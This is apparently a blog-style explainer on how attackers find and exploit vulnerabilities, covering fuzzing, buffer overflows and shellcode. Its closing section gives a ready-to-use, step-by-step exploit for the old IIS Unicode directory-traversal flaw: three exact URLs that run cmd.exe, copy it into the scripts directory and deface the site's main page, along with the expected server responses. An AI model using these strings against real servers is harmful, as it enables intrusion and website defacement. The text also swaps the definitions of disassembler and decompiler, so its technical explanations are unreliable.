How Do Hackers Break Into Computers?
"You have to be a Hacker or think like a Hacker,for making a well designed security system."
for breaking into a computer hackers discovered(find) vulnerabilities and then create an exploit (a program or set of instructions to be followed by hand) that takes advantage of the vulnerabilities. These vulnerabilities and their related exploit programs, if made public, are then used by many others, good and bad. For example, some users are system administrators using them to test their systems. Others are computer hackers just wanting to have fun. Then there are the crackers who scan systems to determine which computers have vulnerabilities and then carry out an attack.
How to Discover New Vulnerabilities
Many of the most skilled individuals involved in discovering new ways to break into computers work in corporate, governmental, or academic laboratories. They not only use considerable brainpower and creativity in their jobs but also typically create and use sophisticated software tools to assist them in their research duties. (The National Security Agency, or NSA, was one of the earliest government agencies to create such a research group). Even in these research environments, the people who find ways to break into computers typically describe themselves as "hackers." The analyst access to the source code (that is, commands the programmers write). This process is called "white-box" analysis. Depending on the software language they are examining for vulnerabilities, usually there are programs that will scan for commands or syntax known to cause problems. Some programming languages, most famously Java, are inherently designed to resist security flaws.
Disassemblers and Decompilers
A disassembler converts a program back into the original programming language. This is a difficult task, and it is likely to work only with a small program, typically one written in Java. A decompiler converts software into assembly language. Assembly language is a low-level language far more difficult to understand than the high-level languages in which most computer programs are written. Nevertheless, a sufficiently talented programmer can analyze assembly language. Although decompilers are typically able to handle larger programs than are disassemblers, they can process only comparatively small programs. Today, decompilers are the tools of choice to analyze worms, viruses, and other small instances of malware (that is, malicious programs).
WINDOWS XP
In Windows XP, some 40 million lines of source code confront the analyst team or crackers. It is difficult for decompiler to extract code from such a big program. Even a debugger would make little headway. So, other alternatives are choosen, the most prevalent of which is the "black box" analysis. In this process, the professional analyst team or crackers try to find all the possible ways to give inputs. They then try the inputs to determine whether they have the potential to "crash" a system or evade security. Because of the difficulty of this process, the team or the individual uses a "fault injection" tool to speed this technique. Examples of fault injection include a database query crafted to command a database server to erase everything, or a Web browser URL infecting a Web server with a worm. The process of trying all those different inputs looking for some fault is also known as fuzzing.
Buffer Overflows
Buffer and heap overflows are special cases of fault injection. Testing for these conditions has discovered the majority of computer security flaws known today. Basically, a "buffer overflow" is a condition whereby too much data is placed in too little allocated space in a computer's memory. The extra data, if properly crafted, and if inserted into a program with the right kind of access to memory, can end up in a region of memory enabling a break-in.
Crackers have discovered buffer overflows by simply trying super-long data inputs, such as typing a long URL into a browser location window. A super-long URL is an example of an "injection vector." When the attacker sees some sort of error condition resulting from this injection, this is a sign that a buffer overflow has occurred. An example of an error condition is to get the error message on a UNIX-type of system known as "segmentation fault." The trick is to see whether one may use the overflow condition to break into a computer. The attacker next inserts "shellcode" into this long string of data. Shellcode is a compiled program actually performing the break-in. Shellcode is the "payload" of the exploit.
FINAL ATTACK
After the cracker has detected vulnerabilities in the system he or she has decided to attack, the next step is to carry out the attack. In some cases, the exploit itself is easy. What follows is an example of an exploit to break into a Windows 2000 Web server and deface its Website. This exploit will work on Windows 2000 Server or Windows Professional, but only if it has not been patched beyond Service Pack 2, and only if it is running IIS or a Personal Web Server that is not patched.
1)The attack program is simply a Web browser, and the attacker just has to insert a series of URLs in the location window. The first URL identifies whether the server is likely to be vulnerable:
http://victim.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+"dir%20c:\"
In the preceding URL, %20 means "space." The "+" also means "space." The %255c is Unicode encoded. After it goes through the Unicode translation, the attacker winds up with 5c, which is hex for ‘\'. So from the string ..%255c..%255c, you get ..\..\ for "go up two directories."
If the victim computer is vulnerable, the attacker's browser will show something like the following:
Directory of c:\09/21/2001 09:59a ASFRoot
09/22/2001 06:53a Documents and Settings
09/21/2001 05:06p Inetpub
09/29/2001 05:37p Microsoft UAM Volume
09/21/2001 05:09p Program Files
10/01/2001 03:57p WINNT
0 File(s) 0 bytes
6 Dir(s) 8,984,092,672 bytes free
2)The next malicious URL the attacker must insert is as follows:
http://victim.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+"copy%20..\..\winnt\system32\cmd.exe%20..\scripts\cmd1.exe"
This copies cmd.exe (running the MS-DOS program in Windows 2000, NT and XP) into the Web server's scripts directory. This directory holds CGI (Common Gateway Interface) programs. (Examples of CGI programs are shopping carts and programs to search the local Website.) If the server is vulnerable, the attacker sees the following in the browser:
CGI Error.
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are
1 file(s) copied.
This error message reveals that the attack copied the cmd.exe program into the scripts directory.
3)The final step is to insert this URL:
http://victim.com/scripts/..%c1%9c../inetpub/scripts/cmd1.exe?/c+echo+I%20broke%20in%20xyz!+../wwwroot/iisstart.asp&dir&type+../wwwroot/iisstart.asp
This creates a main page for the Website that says, "I broke in xyz!" Note that this only works if the main page is named iisstart.asp. If it is named something else, such as index.shtml, the attacker must make the substitution for the proper main page name.
In this way hackers Invade your system,so be ready to face the Hackers.